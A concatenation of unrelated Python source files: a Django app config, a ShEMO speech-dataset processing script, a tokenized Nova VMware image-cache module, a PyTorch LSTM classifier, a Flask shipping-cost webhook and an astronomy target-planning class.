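#               'log': {...}}       # passed to tt_web.log.initilize
#     web.run_app(create_application(config), port=8888)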
|
py | 1a4fc1bd602debb1bd5b2e3b180f5ead26d6bb13 | """
.. module:: django_core_utils.apps
:synopsis: django_core_utils app configuration module.
django_core_utils app configuration module.
"""
from django.apps import AppConfig
class CoreUtilsConfig(AppConfig):
"""CoreUtils application configuration class.
"""
name = 'django_core_utils'
|
py | 1a4fc2afbfcda0b35dfc94bd174b57d40165ff31 | """Process the raw ShEMO dataset.
This assumes the file structure from the original compressed file:
/.../
male/
*.wav
female/
...
"""
from pathlib import Path
import click
from ertk.dataset import resample_audio, write_annotations, write_filelist
from ertk.utils import PathlibPath
emotion_map = {
"A": "anger",
"H": "happiness",
"N": "neutral",
"S": "sadness",
"W": "surprise",
"F": "fear",
}
unused_emotions = ["F"]
@click.command()
@click.argument("input_dir", type=PathlibPath(exists=True, file_okay=False))
@click.option("--resample/--noresample", default=True)
def main(input_dir: Path, resample: bool):
"""Process the ShEMO dataset at location INPUT_DIR and resample
audio to 16 kHz 16-bit WAV audio.
"""
paths = list(input_dir.glob("*/*.wav"))
if resample:
resample_dir = Path("resampled")
resample_audio(paths, resample_dir)
write_filelist(resample_dir.glob("*.wav"), "files_all")
write_filelist(
[p for p in resample_dir.glob("*.wav") if p.stem[3] not in unused_emotions],
"files_5class",
)
write_annotations({p.stem: emotion_map[p.stem[3]] for p in paths}, "label")
speaker_dict = {p.stem: p.stem[:3] for p in paths}
write_annotations(speaker_dict, "speaker")
write_annotations({k: v[0] for k, v in speaker_dict.items()}, "gender")
write_annotations({p.stem: "ar" for p in paths}, "language")
if __name__ == "__main__":
main()
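# Example invocation (sketch; the script name and dataset path are placeholders):
#     python process_shemo.py /path/to/shemo --resample
#     python process_shemo.py /path/to/shemo --noresample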
|
py | 1a4fc2bf8c379463eda2689cfcbf9796c8b5da94 | begin_unit
comment|'# Copyright (c) 2014 VMware, Inc.'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# Licensed under the Apache License, Version 2.0 (the "License"); you may'
nl|'\n'
comment|'# not use this file except in compliance with the License. You may obtain'
nl|'\n'
comment|'# a copy of the License at'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# http://www.apache.org/licenses/LICENSE-2.0'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# Unless required by applicable law or agreed to in writing, software'
nl|'\n'
comment|'# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT'
nl|'\n'
comment|'# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the'
nl|'\n'
comment|'# License for the specific language governing permissions and limitations'
nl|'\n'
comment|'# under the License.'
nl|'\n'
nl|'\n'
string|'"""\nImage cache class\n\nImages that are stored in the cache folder will be stored in a folder whose\nname is the image ID. In the event that an image is discovered to be no longer\nused then a timestamp will be added to the image folder.\nThe timestamp will be a folder - this is due to the fact that we can use the\nVMware API\'s for creating and deleting of folders (it really simplifies\nthings). The timestamp will contain the time, on the compute node, when the\nimage was first seen to be unused.\nAt each aging iteration we check if the image can be aged.\nThis is done by comparing the current nova compute time to the time embedded\nin the timestamp. If the time exceeds the configured aging time then\nthe parent folder, that is the image ID folder, will be deleted.\nThat effectively ages the cached image.\nIf an image is used then the timestamps will be deleted.\n\nWhen accessing a timestamp we make use of locking. This ensure that aging\nwill not delete an image during the spawn operation. When spawning\nthe timestamp folder will be locked and the timestamps will be purged.\nThis will ensure that an image is not deleted during the spawn.\n"""'
newline|'\n'
nl|'\n'
name|'from'
name|'oslo_concurrency'
name|'import'
name|'lockutils'
newline|'\n'
name|'from'
name|'oslo_config'
name|'import'
name|'cfg'
newline|'\n'
name|'from'
name|'oslo_log'
name|'import'
name|'log'
name|'as'
name|'logging'
newline|'\n'
name|'from'
name|'oslo_utils'
name|'import'
name|'timeutils'
newline|'\n'
name|'from'
name|'oslo_vmware'
name|'import'
name|'exceptions'
name|'as'
name|'vexc'
newline|'\n'
name|'from'
name|'oslo_vmware'
name|'import'
name|'vim_util'
name|'as'
name|'vutil'
newline|'\n'
nl|'\n'
name|'from'
name|'nova'
op|'.'
name|'i18n'
name|'import'
name|'_LI'
op|','
name|'_LW'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'virt'
name|'import'
name|'imagecache'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'virt'
op|'.'
name|'vmwareapi'
name|'import'
name|'ds_util'
newline|'\n'
nl|'\n'
DECL|variable|LOG
name|'LOG'
op|'='
name|'logging'
op|'.'
name|'getLogger'
op|'('
name|'__name__'
op|')'
newline|'\n'
nl|'\n'
DECL|variable|CONF
name|'CONF'
op|'='
name|'cfg'
op|'.'
name|'CONF'
newline|'\n'
nl|'\n'
DECL|variable|TIMESTAMP_PREFIX
name|'TIMESTAMP_PREFIX'
op|'='
string|"'ts-'"
newline|'\n'
DECL|variable|TIMESTAMP_FORMAT
name|'TIMESTAMP_FORMAT'
op|'='
string|"'%Y-%m-%d-%H-%M-%S'"
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|ImageCacheManager
name|'class'
name|'ImageCacheManager'
op|'('
name|'imagecache'
op|'.'
name|'ImageCacheManager'
op|')'
op|':'
newline|'\n'
DECL|member|__init__
indent|' '
name|'def'
name|'__init__'
op|'('
name|'self'
op|','
name|'session'
op|','
name|'base_folder'
op|')'
op|':'
newline|'\n'
indent|' '
name|'super'
op|'('
name|'ImageCacheManager'
op|','
name|'self'
op|')'
op|'.'
name|'__init__'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_session'
op|'='
name|'session'
newline|'\n'
name|'self'
op|'.'
name|'_base_folder'
op|'='
name|'base_folder'
newline|'\n'
name|'self'
op|'.'
name|'_ds_browser'
op|'='
op|'{'
op|'}'
newline|'\n'
nl|'\n'
DECL|member|_folder_delete
dedent|''
name|'def'
name|'_folder_delete'
op|'('
name|'self'
op|','
name|'ds_path'
op|','
name|'dc_ref'
op|')'
op|':'
newline|'\n'
indent|' '
name|'try'
op|':'
newline|'\n'
indent|' '
name|'ds_util'
op|'.'
name|'file_delete'
op|'('
name|'self'
op|'.'
name|'_session'
op|','
name|'ds_path'
op|','
name|'dc_ref'
op|')'
newline|'\n'
dedent|''
name|'except'
op|'('
name|'vexc'
op|'.'
name|'CannotDeleteFileException'
op|','
nl|'\n'
name|'vexc'
op|'.'
name|'FileFaultException'
op|','
nl|'\n'
name|'vexc'
op|'.'
name|'FileLockedException'
op|')'
name|'as'
name|'e'
op|':'
newline|'\n'
comment|'# There may be more than one process or thread that tries'
nl|'\n'
comment|'# to delete the file.'
nl|'\n'
indent|' '
name|'LOG'
op|'.'
name|'warning'
op|'('
name|'_LW'
op|'('
string|'"Unable to delete %(file)s. Exception: %(ex)s"'
op|')'
op|','
nl|'\n'
op|'{'
string|"'file'"
op|':'
name|'ds_path'
op|','
string|"'ex'"
op|':'
name|'e'
op|'}'
op|')'
newline|'\n'
dedent|''
name|'except'
name|'vexc'
op|'.'
name|'FileNotFoundException'
op|':'
newline|'\n'
indent|' '
name|'LOG'
op|'.'
name|'debug'
op|'('
string|'"File not found: %s"'
op|','
name|'ds_path'
op|')'
newline|'\n'
nl|'\n'
DECL|member|enlist_image
dedent|''
dedent|''
name|'def'
name|'enlist_image'
op|'('
name|'self'
op|','
name|'image_id'
op|','
name|'datastore'
op|','
name|'dc_ref'
op|')'
op|':'
newline|'\n'
indent|' '
name|'ds_browser'
op|'='
name|'self'
op|'.'
name|'_get_ds_browser'
op|'('
name|'datastore'
op|'.'
name|'ref'
op|')'
newline|'\n'
name|'cache_root_folder'
op|'='
name|'datastore'
op|'.'
name|'build_path'
op|'('
name|'self'
op|'.'
name|'_base_folder'
op|')'
newline|'\n'
nl|'\n'
comment|'# Check if the timestamp file exists - if so then delete it. This'
nl|'\n'
comment|'# will ensure that the aging will not delete a cache image if it'
nl|'\n'
comment|'# is going to be used now.'
nl|'\n'
name|'path'
op|'='
name|'self'
op|'.'
name|'timestamp_folder_get'
op|'('
name|'cache_root_folder'
op|','
name|'image_id'
op|')'
newline|'\n'
nl|'\n'
comment|'# Lock to ensure that the spawn will not try and access an image'
nl|'\n'
comment|'# that is currently being deleted on the datastore.'
nl|'\n'
name|'with'
name|'lockutils'
op|'.'
name|'lock'
op|'('
name|'str'
op|'('
name|'path'
op|')'
op|','
name|'lock_file_prefix'
op|'='
string|"'nova-vmware-ts'"
op|','
nl|'\n'
name|'external'
op|'='
name|'True'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'timestamp_cleanup'
op|'('
name|'dc_ref'
op|','
name|'ds_browser'
op|','
name|'path'
op|')'
newline|'\n'
nl|'\n'
DECL|member|timestamp_folder_get
dedent|''
dedent|''
name|'def'
name|'timestamp_folder_get'
op|'('
name|'self'
op|','
name|'ds_path'
op|','
name|'image_id'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Returns the timestamp folder."""'
newline|'\n'
name|'return'
name|'ds_path'
op|'.'
name|'join'
op|'('
name|'image_id'
op|')'
newline|'\n'
nl|'\n'
DECL|member|timestamp_cleanup
dedent|''
name|'def'
name|'timestamp_cleanup'
op|'('
name|'self'
op|','
name|'dc_ref'
op|','
name|'ds_browser'
op|','
name|'ds_path'
op|')'
op|':'
newline|'\n'
indent|' '
name|'ts'
op|'='
name|'self'
op|'.'
name|'_get_timestamp'
op|'('
name|'ds_browser'
op|','
name|'ds_path'
op|')'
newline|'\n'
name|'if'
name|'ts'
op|':'
newline|'\n'
indent|' '
name|'ts_path'
op|'='
name|'ds_path'
op|'.'
name|'join'
op|'('
name|'ts'
op|')'
newline|'\n'
name|'LOG'
op|'.'
name|'debug'
op|'('
string|'"Timestamp path %s exists. Deleting!"'
op|','
name|'ts_path'
op|')'
newline|'\n'
comment|'# Image is used - no longer need timestamp folder'
nl|'\n'
name|'self'
op|'.'
name|'_folder_delete'
op|'('
name|'ts_path'
op|','
name|'dc_ref'
op|')'
newline|'\n'
nl|'\n'
DECL|member|_get_timestamp
dedent|''
dedent|''
name|'def'
name|'_get_timestamp'
op|'('
name|'self'
op|','
name|'ds_browser'
op|','
name|'ds_path'
op|')'
op|':'
newline|'\n'
indent|' '
name|'files'
op|'='
name|'ds_util'
op|'.'
name|'get_sub_folders'
op|'('
name|'self'
op|'.'
name|'_session'
op|','
name|'ds_browser'
op|','
name|'ds_path'
op|')'
newline|'\n'
name|'if'
name|'files'
op|':'
newline|'\n'
indent|' '
name|'for'
name|'file'
name|'in'
name|'files'
op|':'
newline|'\n'
indent|' '
name|'if'
name|'file'
op|'.'
name|'startswith'
op|'('
name|'TIMESTAMP_PREFIX'
op|')'
op|':'
newline|'\n'
indent|' '
name|'return'
name|'file'
newline|'\n'
nl|'\n'
DECL|member|_get_timestamp_filename
dedent|''
dedent|''
dedent|''
dedent|''
name|'def'
name|'_get_timestamp_filename'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'return'
string|"'%s%s'"
op|'%'
op|'('
name|'TIMESTAMP_PREFIX'
op|','
nl|'\n'
name|'timeutils'
op|'.'
name|'utcnow'
op|'('
op|')'
op|'.'
name|'strftime'
op|'('
name|'TIMESTAMP_FORMAT'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|_get_datetime_from_filename
dedent|''
name|'def'
name|'_get_datetime_from_filename'
op|'('
name|'self'
op|','
name|'timestamp_filename'
op|')'
op|':'
newline|'\n'
indent|' '
name|'ts'
op|'='
name|'timestamp_filename'
op|'.'
name|'lstrip'
op|'('
name|'TIMESTAMP_PREFIX'
op|')'
newline|'\n'
name|'return'
name|'timeutils'
op|'.'
name|'parse_strtime'
op|'('
name|'ts'
op|','
name|'fmt'
op|'='
name|'TIMESTAMP_FORMAT'
op|')'
newline|'\n'
nl|'\n'
DECL|member|_get_ds_browser
dedent|''
name|'def'
name|'_get_ds_browser'
op|'('
name|'self'
op|','
name|'ds_ref'
op|')'
op|':'
newline|'\n'
indent|' '
name|'ds_browser'
op|'='
name|'self'
op|'.'
name|'_ds_browser'
op|'.'
name|'get'
op|'('
name|'ds_ref'
op|'.'
name|'value'
op|')'
newline|'\n'
name|'if'
name|'not'
name|'ds_browser'
op|':'
newline|'\n'
indent|' '
name|'ds_browser'
op|'='
name|'vutil'
op|'.'
name|'get_object_property'
op|'('
name|'self'
op|'.'
name|'_session'
op|'.'
name|'vim'
op|','
nl|'\n'
name|'ds_ref'
op|','
nl|'\n'
string|'"browser"'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_ds_browser'
op|'['
name|'ds_ref'
op|'.'
name|'value'
op|']'
op|'='
name|'ds_browser'
newline|'\n'
dedent|''
name|'return'
name|'ds_browser'
newline|'\n'
nl|'\n'
DECL|member|_list_datastore_images
dedent|''
name|'def'
name|'_list_datastore_images'
op|'('
name|'self'
op|','
name|'ds_path'
op|','
name|'datastore'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Return a list of the images present in _base.\n\n This method returns a dictionary with the following keys:\n - unexplained_images\n - originals\n """'
newline|'\n'
name|'ds_browser'
op|'='
name|'self'
op|'.'
name|'_get_ds_browser'
op|'('
name|'datastore'
op|'.'
name|'ref'
op|')'
newline|'\n'
name|'originals'
op|'='
name|'ds_util'
op|'.'
name|'get_sub_folders'
op|'('
name|'self'
op|'.'
name|'_session'
op|','
name|'ds_browser'
op|','
nl|'\n'
name|'ds_path'
op|')'
newline|'\n'
name|'return'
op|'{'
string|"'unexplained_images'"
op|':'
op|'['
op|']'
op|','
nl|'\n'
string|"'originals'"
op|':'
name|'originals'
op|'}'
newline|'\n'
nl|'\n'
DECL|member|_age_cached_images
dedent|''
name|'def'
name|'_age_cached_images'
op|'('
name|'self'
op|','
name|'context'
op|','
name|'datastore'
op|','
name|'dc_info'
op|','
nl|'\n'
name|'ds_path'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Ages cached images."""'
newline|'\n'
name|'age_seconds'
op|'='
name|'CONF'
op|'.'
name|'remove_unused_original_minimum_age_seconds'
newline|'\n'
name|'unused_images'
op|'='
name|'self'
op|'.'
name|'originals'
op|'-'
name|'self'
op|'.'
name|'used_images'
newline|'\n'
name|'ds_browser'
op|'='
name|'self'
op|'.'
name|'_get_ds_browser'
op|'('
name|'datastore'
op|'.'
name|'ref'
op|')'
newline|'\n'
name|'for'
name|'image'
name|'in'
name|'unused_images'
op|':'
newline|'\n'
indent|' '
name|'path'
op|'='
name|'self'
op|'.'
name|'timestamp_folder_get'
op|'('
name|'ds_path'
op|','
name|'image'
op|')'
newline|'\n'
comment|'# Lock to ensure that the spawn will not try and access an image'
nl|'\n'
comment|'# that is currently being deleted on the datastore.'
nl|'\n'
name|'with'
name|'lockutils'
op|'.'
name|'lock'
op|'('
name|'str'
op|'('
name|'path'
op|')'
op|','
name|'lock_file_prefix'
op|'='
string|"'nova-vmware-ts'"
op|','
nl|'\n'
name|'external'
op|'='
name|'True'
op|')'
op|':'
newline|'\n'
indent|' '
name|'ts'
op|'='
name|'self'
op|'.'
name|'_get_timestamp'
op|'('
name|'ds_browser'
op|','
name|'path'
op|')'
newline|'\n'
name|'if'
name|'not'
name|'ts'
op|':'
newline|'\n'
indent|' '
name|'ts_path'
op|'='
name|'path'
op|'.'
name|'join'
op|'('
name|'self'
op|'.'
name|'_get_timestamp_filename'
op|'('
op|')'
op|')'
newline|'\n'
name|'try'
op|':'
newline|'\n'
indent|' '
name|'ds_util'
op|'.'
name|'mkdir'
op|'('
name|'self'
op|'.'
name|'_session'
op|','
name|'ts_path'
op|','
name|'dc_info'
op|'.'
name|'ref'
op|')'
newline|'\n'
dedent|''
name|'except'
name|'vexc'
op|'.'
name|'FileAlreadyExistsException'
op|':'
newline|'\n'
indent|' '
name|'LOG'
op|'.'
name|'debug'
op|'('
string|'"Timestamp already exists."'
op|')'
newline|'\n'
dedent|''
name|'LOG'
op|'.'
name|'info'
op|'('
name|'_LI'
op|'('
string|'"Image %s is no longer used by this node. "'
nl|'\n'
string|'"Pending deletion!"'
op|')'
op|','
name|'image'
op|')'
newline|'\n'
dedent|''
name|'else'
op|':'
newline|'\n'
indent|' '
name|'dt'
op|'='
name|'self'
op|'.'
name|'_get_datetime_from_filename'
op|'('
name|'str'
op|'('
name|'ts'
op|')'
op|')'
newline|'\n'
name|'if'
name|'timeutils'
op|'.'
name|'is_older_than'
op|'('
name|'dt'
op|','
name|'age_seconds'
op|')'
op|':'
newline|'\n'
indent|' '
name|'LOG'
op|'.'
name|'info'
op|'('
name|'_LI'
op|'('
string|'"Image %s is no longer used. "'
nl|'\n'
string|'"Deleting!"'
op|')'
op|','
name|'path'
op|')'
newline|'\n'
comment|'# Image has aged - delete the image ID folder'
nl|'\n'
name|'self'
op|'.'
name|'_folder_delete'
op|'('
name|'path'
op|','
name|'dc_info'
op|'.'
name|'ref'
op|')'
newline|'\n'
nl|'\n'
comment|'# If the image is used and the timestamp file exists then we delete'
nl|'\n'
comment|'# the timestamp.'
nl|'\n'
dedent|''
dedent|''
dedent|''
dedent|''
name|'for'
name|'image'
name|'in'
name|'self'
op|'.'
name|'used_images'
op|':'
newline|'\n'
indent|' '
name|'path'
op|'='
name|'self'
op|'.'
name|'timestamp_folder_get'
op|'('
name|'ds_path'
op|','
name|'image'
op|')'
newline|'\n'
name|'with'
name|'lockutils'
op|'.'
name|'lock'
op|'('
name|'str'
op|'('
name|'path'
op|')'
op|','
name|'lock_file_prefix'
op|'='
string|"'nova-vmware-ts'"
op|','
nl|'\n'
name|'external'
op|'='
name|'True'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'timestamp_cleanup'
op|'('
name|'dc_info'
op|'.'
name|'ref'
op|','
name|'ds_browser'
op|','
nl|'\n'
name|'path'
op|')'
newline|'\n'
nl|'\n'
DECL|member|update
dedent|''
dedent|''
dedent|''
name|'def'
name|'update'
op|'('
name|'self'
op|','
name|'context'
op|','
name|'instances'
op|','
name|'datastores_info'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""The cache manager entry point.\n\n This will invoke the cache manager. This will update the cache\n according to the defined cache management scheme. The information\n populated in the cached stats will be used for the cache management.\n """'
newline|'\n'
comment|'# read running instances data'
nl|'\n'
name|'running'
op|'='
name|'self'
op|'.'
name|'_list_running_instances'
op|'('
name|'context'
op|','
name|'instances'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'used_images'
op|'='
name|'set'
op|'('
name|'running'
op|'['
string|"'used_images'"
op|']'
op|'.'
name|'keys'
op|'('
op|')'
op|')'
newline|'\n'
comment|'# perform the aging and image verification per datastore'
nl|'\n'
name|'for'
op|'('
name|'datastore'
op|','
name|'dc_info'
op|')'
name|'in'
name|'datastores_info'
op|':'
newline|'\n'
indent|' '
name|'ds_path'
op|'='
name|'datastore'
op|'.'
name|'build_path'
op|'('
name|'self'
op|'.'
name|'_base_folder'
op|')'
newline|'\n'
name|'images'
op|'='
name|'self'
op|'.'
name|'_list_datastore_images'
op|'('
name|'ds_path'
op|','
name|'datastore'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'originals'
op|'='
name|'images'
op|'['
string|"'originals'"
op|']'
newline|'\n'
name|'self'
op|'.'
name|'_age_cached_images'
op|'('
name|'context'
op|','
name|'datastore'
op|','
name|'dc_info'
op|','
name|'ds_path'
op|')'
newline|'\n'
nl|'\n'
DECL|member|get_image_cache_folder
dedent|''
dedent|''
name|'def'
name|'get_image_cache_folder'
op|'('
name|'self'
op|','
name|'datastore'
op|','
name|'image_id'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Returns datastore path of folder containing the image."""'
newline|'\n'
name|'return'
name|'datastore'
op|'.'
name|'build_path'
op|'('
name|'self'
op|'.'
name|'_base_folder'
op|','
name|'image_id'
op|')'
newline|'\n'
dedent|''
dedent|''
endmarker|''
end_unit
|
py | 1a4fc312cb76fd2946a5e55dc0fd56a0ebc212e6 | import torch.nn as nn
import torch
from modules.lstm_encoder import LSTMEncoder
from modules.self_attention import SelfAttention
from modules.binary_decoder import BinaryDecoder
class BinaryLSTMClassifier(nn.Module):
def __init__(self, emb_dim, hidden_dim, vocab_size, num_label, attention_mode, args):
super(BinaryLSTMClassifier, self).__init__()
self.num_label = num_label
self.hidden_dim = hidden_dim
self.vocab_size = vocab_size
self.emb_dim = emb_dim
self.args = args
# Encoder
self.encoder = LSTMEncoder(emb_dim, hidden_dim, vocab_size, encoder_dropout=args.encoder_dropout)
if self.encoder.bidirectional:
hidden_dim = hidden_dim * 2
# Init Attention
if attention_mode == 'self':
self.att = SelfAttention
        elif attention_mode == 'None':
            self.att = None
        else:
            raise ValueError("attention_mode must be 'self' or 'None'")
if self.att is not None:
self.attention_layer = self.att(hidden_dim)
# Decoder
self.decoder = BinaryDecoder(hidden_dim, num_label)
def load_encoder_embedding(self, emb, fix_emb=False):
self.encoder.embeddings.weight = nn.Parameter(torch.FloatTensor(emb))
if fix_emb:
self.encoder.embeddings.weight.requires_grad = False
def forward(self, x, seq_len, elmo):
out, hidden = self.encoder(x, seq_len, elmo)
if self.att is not None:
out, alpha = self.attention_layer(out, seq_len.view(-1))
else:
seq_len_expand = seq_len.view(-1, 1, 1).expand(out.size(0), 1, out.size(2)) - 1
out = torch.gather(out, 1, seq_len_expand).squeeze(1)
pred = self.decoder(out)
return pred
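# Example usage (sketch; tensor shapes and the ``elmo`` argument depend on the
# project's LSTMEncoder implementation, which is not shown here, so this is
# illustrative only):
#
#     from argparse import Namespace
#
#     args = Namespace(encoder_dropout=0.2)
#     model = BinaryLSTMClassifier(emb_dim=300, hidden_dim=128, vocab_size=10000,
#                                  num_label=8, attention_mode='self', args=args)
#     # x: LongTensor of token ids [batch, seq]; lengths: LongTensor [batch]
#     # pred = model(x, lengths, elmo)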
|
py | 1a4fc37ba73c43ff592621f33c1baabd73e5a2c4 | #!/usr/bin/env python
import urllib
import json
import os
from flask import Flask
from flask import request
from flask import make_response
# Flask app should start in global layout
app = Flask(__name__)
@app.route('/webhook', methods=['POST'])
def webhook():
req = request.get_json(silent=True, force=True)
print("Request:")
print(json.dumps(req, indent=4))
res = makeWebhookResult(req)
res = json.dumps(res, indent=4)
print(res)
r = make_response(res)
r.headers['Content-Type'] = 'application/json'
return r
def makeWebhookResult(req):
if req.get("result").get("action") != "shipping.cost":
return {}
result = req.get("result")
parameters = result.get("parameters")
zone = parameters.get("shipping-zone")
cost = {'Europe':100, 'North America':200, 'South America':300, 'Asia':400, 'Africa':500}
speech = "The cost of shipping to " + zone + " is " + str(cost[zone]) + " euros."
print("Response:")
print(speech)
return {
"speech": speech,
"displayText": speech,
"data": {},
"contextOut": [],
"source": "apiai-onlinestore-shipping"
}
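# Example payload (sketch of the API.AI / Dialogflow v1 style request this handler
# parses; the values are illustrative):
#
#     {"result": {"action": "shipping.cost",
#                 "parameters": {"shipping-zone": "Europe"}}}
#
# makeWebhookResult would then return speech/displayText of
# "The cost of shipping to Europe is 100 euros."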
if __name__ == '__main__':
port = int(os.getenv('PORT', 5000))
print("Starting app on port %d" % port)
app.run(debug=True, port=port, host='0.0.0.0')
|
py | 1a4fc42ec0c4ee349378f129d9ab57347c44930c |
from astropy.io import fits
import numpy as np
import matplotlib.pyplot as plt
import astropy.units as u
from astropy.wcs import WCS
from astropy.coordinates import SkyCoord
import pandas as pd
from photutils.aperture import SkyRectangularAperture, SkyCircularAperture
from .imaging import implot
from astroquery.skyview import SkyView
__all__ = ['Target']
class Target():
def __init__(self,name,parse_name=True,coordinates=None,coord_units=None):
'''
Initializes the Target object.
Parameters
----------
name: str
name to use for the target throughout the suite.
parse_name: bool, optional, default True
If the name is that of a known object resolvable by Simbad, parse it to determine coordinates.
coordinates: SkyCoord or str, optional, default None
If parse_name is False, supply coordinates for the target manually. Must be a SkyCoord object or string with coordinates. If string, coord_units must be supplied.
coord_units: tuple or str, optional, default None
if supplying coordinates as a string, the units as accepted by SkyCoord must be provided, e.g., (u.hourangle,u.deg) or 'deg'.
Returns
-------
None
Sets
----
configs: dict
a dictionary containing configuration information.
Notes
-----
It is not strictly necessary for the Target itself to have coordinates defined, but every configuration must.
'''
self.name = name
if parse_name:
self.coordinates = SkyCoord.from_name(name)
else:
if coordinates is not None:
if isinstance(coordinates,str):
if coord_units is None:
raise AssertionError('When providing string coordinates, a coordinate units accepted by SkyCoord are required to be passed to coord_units')
else:
self.coordinates = SkyCoord(coordinates,unit=coord_units)
elif isinstance(coordinates,SkyCoord):
self.coordinates = coordinates
self.configs = {}
def add_configuration(self,config_name,obstype=None,coordinates=None,coord_units=None,**kwargs):
'''
Add an observing configuration for this target, specifying as many fields as desired.
Parameters
----------
config_name: str
Name for this configuration. As names are eventually used in the exporting of targetlists, it is worth keeping the name short-ish, as many observatories have character limits on this column
obstype: str, optional, default None
For now, either 'imaging' or 'spectroscopy'. Some features later on depend on this.
coordinates: str or SkyCoord, optional, default None
If the coordinates of this configuration differ from the object coordinates or from other configurations, supply coordinates (either SkyCoord or string). If string, coord_units must be provided.
coord_units: tuple or str, optional, default None
If coordinates are provided as a string, a unit (e.g., (u.hourangle, u.deg) or 'deg') as accepted by SkyCoord is required.
**kwargs: optional
Any desired fields for this configuration one wants displayed later, e.g., slit pa, slit width, etc., can be added as keyword arguments with values, and will be stored.
Returns
-------
None
Sets
----
self.configs: dict
dictionary of all configuration specifications.
'''
if config_name in self.configs.keys():
cont = input(f'Config Name {config_name} already a configuration. Overwrite? [Enter yes, N for no]: ')
if cont.upper() == 'N':
return
self.configs[config_name] = {}
self.configs[config_name]['obstype']= obstype
if coordinates is not None:
if isinstance(coordinates,SkyCoord):
self.configs[config_name]['coordinates'] = coordinates
elif isinstance(coordinates,str):
if coord_units is None:
raise AssertionError('When providing string coordinates, a coordinate units accepted by SkyCoord are required to be passed to coord_units')
else:
self.configs[config_name]['coordinates'] = SkyCoord(coordinates,unit=coord_units)
elif self.coordinates is not None:
self.configs[config_name]['coordinates'] = self.coordinates
else:
self.configs[config_name]['coordinates'] = None
for i in kwargs.keys():
self.configs[config_name][i] = kwargs[i]
def remove_configuration(self,config_name):
'''
Remove a configuration from the list
Parameters
----------
config_name: str
the configuration name to remove
'''
try:
self.configs.pop(config_name)
except KeyError:
print('config not found')
return
def edit_configuration(self,config_name,quantity,value):
'''
Edit a configuration by changing the value in one of the columns.
Parameters
----------
config_name: str
the name of the configuration to edit
quantity: str
the name of the quantity (e.g., 'obstype', or a quantity added via keyword argument) to edit
value: Any
updated value. As a note, we recommend only using this for simple string/display values. Editing, e.g., coordinates this way does not run the code to make a new SkyCoord. To change the coordinates associated with a configuration, we suggest re-adding it (with the same name) but new coords to overwrite it.
'''
try:
self.configs[config_name][quantity] = value
except KeyError:
print('configuration name not found')
return
def add_offset_star(self,coordinate,coord_units=None,configurations='all'):
'''
        Add an offset star to the configuration. Offset stars are used to execute blind offsets when a source is too faint to see in typical acquisition exposures.
        If an offset star is provided, the offsets between the star and the configuration's coordinates (in arcsec east and north) are automatically calculated and added to the configuration.
Parameters
----------
coordinate: str or SkyCoord
coordinates of the offset star. Either SkyCoord object or string. If string provided, must also provide coord_units for creation of SkyCoord object.
coord_units: tuple or str, optional, default None
if coordinates provided as a string, units acceptable by SkyCoord (e.g., (u.hourangle, u.deg) or 'deg') must be provided here.
configurations: str or list, optional, default 'all'
Which configurations to apply this offset star to. Default is 'all', one can pass individual configuration names as strings, or a list of configuration names (as strings).
Returns
-------
None
Sets
----
        Sets the 'offset star' key for the chosen configuration(s) to the star coordinates and the 'offsets' key to the offsets, visible via list_configurations().
'''
if isinstance(coordinate,str):
if coord_units is not None:
coord = SkyCoord(coordinate,unit=coord_units)
else:
raise AssertionError('If string coordinate provided, units must be provided for SkyCoord creation')
elif isinstance(coordinate,SkyCoord):
coord = coordinate
if configurations=='all':
for i in self.configs.keys():
os = coord.spherical_offsets_to(self.configs[i]['coordinates'])
os = [os[0].to(u.arcsec).value,os[1].to(u.arcsec).value]
add_str = f'''{os[0]:.3f}'' E, {os[1]:.3f}'' N'''
self.configs[i]['offset star'] = coord
self.configs[i]['offsets'] = add_str
elif isinstance(configurations,str):
os = coord.spherical_offsets_to(self.configs[configurations]['coordinates'])
os = [os[0].to(u.arcsec).value,os[1].to(u.arcsec).value]
add_str = f'''{os[0]:.3f}'' E, {os[1]:.3f}'' N'''
self.configs[configurations]['offset star'] = coord
self.configs[configurations]['offsets'] = add_str
elif isinstance(configurations,list):
for i in configurations:
os = coord.spherical_offsets_to(self.configs[i]['coordinates'])
os = [os[0].to(u.arcsec).value,os[1].to(u.arcsec).value]
add_str = f'''{os[0]:.3f}'' E, {os[1]:.3f}'' N'''
self.configs[i]['offset star'] = coord
self.configs[i]['offsets'] = add_str
def set_survey(self,survey_name):
self.survey_name = survey_name
def retrieve_finder_chart(self,config_name,size,pixels=500,show_aperture=True,**implot_kwargs):
'''
        Retrieve a survey image (finder chart; SDSS DR7 g-band by default, or the survey set via set_survey) around the target. If the configuration is spectroscopic, optionally show the location of the slit or circular fiber on the image.
Parameters
----------
config_name: str
name of the configuration to retrieve finder for
size: astropy Quantity
dimensions of the finder box to use. Box is square.
pixels: int, optional (default 500)
dimensions (in pixels) of the image to retrieve. (Larger downloads take longer).
show_aperture: bool, optional (default True)
            flag for whether to show an aperture (rectangular slits and circular apertures supported). If this flag is turned on, the following must be true.
For slits, your configuration must have properties `slit_width`, `slit_length`, and `PA`.
For circular apertures, your configuration must have a property `fiber_radius`.
**implot_kwargs: optional
arguments passed to the utility function `implot` to display the image. These include scale (images are scaled about their mean pixel value), colorbar flag, etc.
Returns
-------
fig, ax: matplotlib figure and axes objects
the fig and ax on which the dss image and possible aperture was plotted.
'''
sv = SkyView()
if hasattr(self,'survey_name'):
survey=self.survey_name
else:
survey='SDSSdr7g'
